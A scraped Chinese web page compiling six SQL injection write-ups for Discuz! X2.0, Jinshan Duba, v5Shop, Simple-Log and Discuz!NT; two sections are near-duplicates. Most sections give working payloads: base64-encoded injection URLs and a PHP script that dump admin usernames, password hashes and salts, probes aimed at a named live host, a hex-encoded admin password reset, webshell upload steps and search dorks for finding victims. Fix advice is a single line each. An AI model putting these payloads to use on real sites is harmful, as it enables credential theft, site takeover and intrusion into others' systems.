欢迎来到千学网!
您现在的位置:首页 > 实用文 > 其他范文

Discuz! X2.0 SQL多个注入漏洞及修复

时间:2023-05-28 08:29:18 其他范文 收藏本文 下载本文

以下是小编帮大家整理的Discuz! X2.0 SQL多个注入漏洞及修复,本文共6篇,仅供参考,欢迎大家阅读。

Discuz! X2.0 SQL多个注入漏洞及修复

篇1:Discuz! X2.0 SQL多个注入漏洞及修复

DZ2.0直接暴管理账号密码(默认前缀的情况下)

/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2V

sZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4N0MzMjc0NzQ3QyxwYXNzd

29yZCkgZnJvbSBwcmVfY29tbW9uX21lbWJlciB3aGVyZSAgdXNlcm5hbWUgbGl

rZSAnYWRtaW58eHx5%3D

base64解码

1′ and 1=2 union all select 1,group_concat(username,0x7C3274747C,password)

from pre_common_member where username like ‘admin|x|y

如果不是默认前缀

暴前缀EXP

/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2V

sZWN0IDEsVEFCTEVfTkFNRSBmcm9tIElORk9STUFUSU9OX1NDSEVNQS5UQUJMR

VMgd2hlcmUgVEFCTEVfU0NIRU1BPWRhdGFiYXNlKCkgYW5kICBUQUJMRV9OQU1

FIGxpa2UgJyVfbWVtYmVyfHh8eQ%3D

———————–

再贴个PHP的EXP

$host=”www.2cto.com”;

$affuser=”要爆的用户名username”;

echo ‘

echo $host.”forum.php?mod=attachment&findpost=ss&aid=”;

echo urlencode(base64_encode(“1′ and 1=2 union all select 1,TABLE_NAME from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA=database and TABLE_NAME like ‘%_member|x|y”));

echo ‘” target=”_blank”>爆前缀’;

echo “”;

echo ‘

echo $host.”forum.php?mod=attachment&findpost=ss&aid=”;

echo urlencode(base64_encode(“1′ and 1=2 union all select 1,group_concat(username,0x7C,password,0x7C,salt) from pre_ucenter_members where username like ‘$affuser|x|y”));

echo ‘” target=”_blank”>爆password,salt’;

?>

修复:官方已经昨天提供了安全升级不定,及时升级

篇2:金山毒霸多个sql注入及XSS漏洞和修复

第一个

简要描述:由于变量过滤不严产生SQL注入漏洞 可通过入侵手段 拿到站点权限

详细说明:labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2

漏洞证明:labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2 and 1=1

labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2 and 1=2

结果明显不同 注入漏洞产生

修复方案:过滤变量app

第二个

简要描述:过滤不严导致存在SQL注入

详细说明:过滤不严导致存在SQL注入 有机会拿下服务器权限

漏洞证明:labs.duba.net/kws/feedback2/his.php?uuid=12B70C061426AAA96F58AE431D180055&app=5%20and%201=2%20union%20select%201,2,version(),4,5,user(),database(),8,9--

labs.duba.net/robots.txt

未作进一步测试

修复方案:过滤参数

第三个:

简要描述:留言处过滤不严 造成跨站漏洞

详细说明:留言处过滤不严 造成跨站漏洞

漏洞证明:labs.duba.net/kws/feedback2/his.php?uuid=12B70C061426AAA96F58AE431D180055&app=5

留言处输入:

修复方案:严格过滤

篇3:金山毒霸多个sql注入及XSS漏洞和修复

金山毒霸多个sql注入及XSS漏洞和修复,需要的朋友可以参考下,

第一个

简要描述:由于变量过滤不严产生SQL注入漏洞 可通过入侵手段 拿到站点权限

详细说明:labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2

漏洞证明:labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2 and 1=1

labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2 and 1=2

结果明显不同 注入漏洞产生

修复方案:过滤变量app

第二个

简要描述:过滤不严导致存在SQL注入

详细说明:过滤不严导致存在SQL注入 有机会拿下服务器权限

漏洞证明:labs.duba.net/kws/feedback2/his.php?uuid=12B70C061426AAA96F58AE431D180055&app=5%20and%201=2%20union%20select%201,2,version,4,5,user(),database(),8,9--

labs.duba.net/robots.txt

未作进一步测试

修复方案:过滤参数

第三个:

简要描述:留言处过滤不严 造成跨站漏洞

详细说明:留言处过滤不严 造成跨站漏洞

漏洞证明:labs.duba.net/kws/feedback2/his.php?uuid=12B70C061426AAA96F58AE431D180055&app=5

篇4:v5Shop注入漏洞及修复

/commond.aspx?id=1869

没办法union,只能让它暴错了

暴管理员用户名:/commond.aspx?id=1869 and 1=(select top 1 [name] from web_admin)--

暴管理员密 码:/commond.aspx?id=1869 and 1=(select top 1 [pass] from web_admin)--

过滤了单引号.只能把字符串转化成16进制的了

更新管理员密码:update web_admin set

pass=0x310046004100450037004200450041004300460035003600330041003200430042

004400450037004400450041003600340042003700430037004300

weblogin/System_Config_Operate.aspx

后台上传水印.可以直接上传大马.

拿webshell

切记.千万不要传ASPX的马......不然不会成功的.

你可以先传ASP的马..再传ASPX马.

马的路径为:uploadFile/Picture/木马.asp

关键字:services.aspxid=

inurl:scoreindex.aspx

默认后台地址:weblogin/Login.aspx

/weblogin/index.aspx

复制这段代码 域名+代码

cart.aspx?act=buy&id=1 and (Select Top 1 char(124)%2BisNull(cast([Name] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([Pass] as varchar(8000)),char(32))%2Bchar(124) From (Select Top 4 [Name],[Pass] From [Web_Admin] Where 1=1 Order by [Name],[Pass]) T Order by [Name] desc,[Pass] desc)>0 --

更新管理员密码:update web_admin setpass=0x310042004600410045003700420045004100430046003500360032003300410032004300420044

00450037004400450041003600340042003700430037004300

weblogin/System_Config_Operate.aspx

后台上传水印.可以直接上传大马.

后台拿webshell

切记.不要传ASPX的马......不然不会成功的.

你可以先传ASP的马..再传ASPX马.

马的路径为:uploadFile/Picture/木马.asp

文章作者:黑面小窝

修复:对照过滤

篇5:simplelog v1.3.1 注入漏洞及修复

Simple-Log是基于PHP+MySQL的开源免费博客系统,系统轻巧运行速度飞快并具有很好的可扩展性.

程序下载地址:html“>/ym/04/27199.html

----------------------------------------------

刚买到vps,打算装个blog系统,看到simple-log比较简洁,就下了最新的装了,,

simplelog v1.3.1 注入漏洞及修复

谁知道,偶刚装好,到前台看到搜索就搜了下,没想到真有洞,urldecode惹的祸。

试了下,真可以爆啊,无语了。

再上一张图吧,数据依然可以爆掉。

作者:tojen

篇6:Discuz!NT 3.0 SQL注入漏洞

对Discuz nT3.0进行了分析,发现spacemanage.aspx页面存在一个注入漏洞,

该页面位置:dnt3_src\dnt3\Discuz.Web\space\Admin

代码如下:

复制代码

public void BindData()

{

DataGrid1.AllowCustomPaging = true;

string username = Username.Text;

//string dateStart = joindateStart.SelectedDate.ToString().IndexOf(”1900“) >= 0 ? ”“ : joindateStart.SelectedDate.ToString();

//string dateEnd = joindateEnd.SelectedDate.AddDays(1).ToString().IndexOf(”1900“) >= 0 ? ”“ : joindateEnd.SelectedDate.AddDays(1).ToString();

string dateStart = joindateStart.SelectedDate.ToString();

string dateEnd = joindateEnd.SelectedDate.AddDays(1).ToString().IndexOf(”1900") >= 0 ? DateTime.Now.AddDays(1).ToString() : joindateEnd.SelectedDate.AddDays(1).ToString();

DataGrid1.VirtualItemCount = DbProvider.GetInstance().GetSpaceRecordCount(username, dateStart, dateEnd);

DataGrid1.DataSource = buildGridData(username,dateStart,dateEnd);

DataGrid1.DataBind();

}

对USERNAME 进行跟踪,发现未对该参数进行任何过滤,

Discuz!NT 3.0 SQL注入漏洞

存在SQL注入漏洞。

本人未对该漏洞进行测试,如果有人测试完证明确实存在请及时联系官方。

马克斯CMScookies注入漏洞漏洞预警

Perforce Server多个远程拒绝服务漏洞

Pulse CMS Basic 本地文件包含漏洞及修复

Discuz!7.07.2后台settings.inc.php中写shell漏洞

Discuz!NT 2.5(0826更新前)注入脚本安全

阿曼达企业网站系统 cookie 注入漏洞0day漏洞预警

漏洞的解释及造句

启航企业建站系统 cookie注入漏洞通杀所有版本漏洞预警

土壤重金属污染来源及修复技术研究

常见问题及对策之如何对齐多个对象

《Discuz! X2.0 SQL多个注入漏洞及修复(精选6篇).doc》
将本文的Word文档下载到电脑,方便收藏和打印
推荐度:
点击下载文档

文档为doc格式

最新推荐
猜你喜欢
点击下载本文文档